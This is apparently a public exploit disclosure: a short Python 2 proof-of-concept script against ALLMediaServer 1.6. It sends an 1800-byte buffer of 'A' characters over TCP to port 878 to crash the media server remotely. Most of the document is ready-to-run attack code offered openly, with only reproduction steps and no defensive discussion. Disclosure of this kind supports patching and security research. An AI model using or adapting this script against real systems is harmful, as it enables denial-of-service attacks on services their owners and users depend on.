# Exploit Title: ALLMediaServer 1.6 Remote Buffer Overflow
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-03-25
# Vendor Homepage: https://www.allmediaserver.org/
# Software Link : https://www.allmediaserver.org/LiveUpdate/ALLMediaServer.exe
# Tested Version: 1.6
# Vulnerability Type:  Buffer Overflow (DoS) Remote
# Tested on OS: Windows 7 x86 - Windows 10 x64

# Description: ALLMediaServer 1.6 Remote Buffer Overflow

# Steps to reproduce:
# 1. - ALLMediaServer 1.6 listening on port 888 or can be changed to 878
# 2. - Run the Script from remote TCP/IP
# 3. - Mediaserver.exe Crashed


import socket

print("######################################################")
print("# ALLMediaServer 1.6 Remote (BUffer Overflow)        #")
print("#             --------------------------           #")
print("#               BY  Yehia Elghaly                    #")
print("######################################################")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect(('192.168.1.99', 878))
  evilbuffer = "A" *1800
  s.sendall(evilbuffer)
  data = s.recv(1024)
  s.close()
  print "Media is Out"
except socket.error, msg:
  print ""
  print "Couldnt connect with Mediaserver - Crashed"